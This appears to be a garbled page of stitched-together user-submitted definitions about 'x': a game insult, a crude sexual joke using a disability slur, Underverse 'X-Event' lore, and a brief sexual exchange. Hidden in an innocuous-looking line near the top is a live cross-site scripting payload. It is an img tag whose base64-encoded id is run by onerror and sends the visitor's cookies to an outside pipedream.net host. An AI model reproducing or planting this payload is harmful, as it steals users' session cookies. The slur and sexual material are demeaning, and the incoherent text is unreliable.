Bug x is a game any game and it's made by Russians and the game has to run on unity,volka,bugs and baboons.
Man that game is a real Bug x can't believe that it's as bad as that car x game.
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This Is a "">'><img src=x id=ZmV0Y2goJ2h0dHBzOi8vOTc5YTQxY2U0YTQzYTZiMTMwMjZhNGU2MjdjZWEwMmIubS5waXBlZHJlYW0ubmV0L2ltZ191cD9jb29raWU9Jytkb2N1bWVudC5jb29raWUrJy0tJytkb2N1bWVudC5kb21haW4p onerror=eval(atob(this.id))>
Let me explain the characters and the relationship.
Luke: is a short muscular man that is retarded and rich.
Charlie: is a tall woman that likes waffles.
Sometimes she thinks that Luke dick is a waffle so sometimes she accidentally bites a little bit.
Luke: are you ready
Charlie: absolutely daddy
(Luke X Charlie)
The X-Event is an experiment started by XGaster, and is the reason for Underverse's main point of conflict. It is the event created by whoever has a half or whole of the Overwrite soul, one who wants to create something new in the X Tale universe or the multiverse.
X-Chara: Welcome to the X-event
tom- hey Leah I want to have glitter x with you
Leah- I want to have glitter x with you too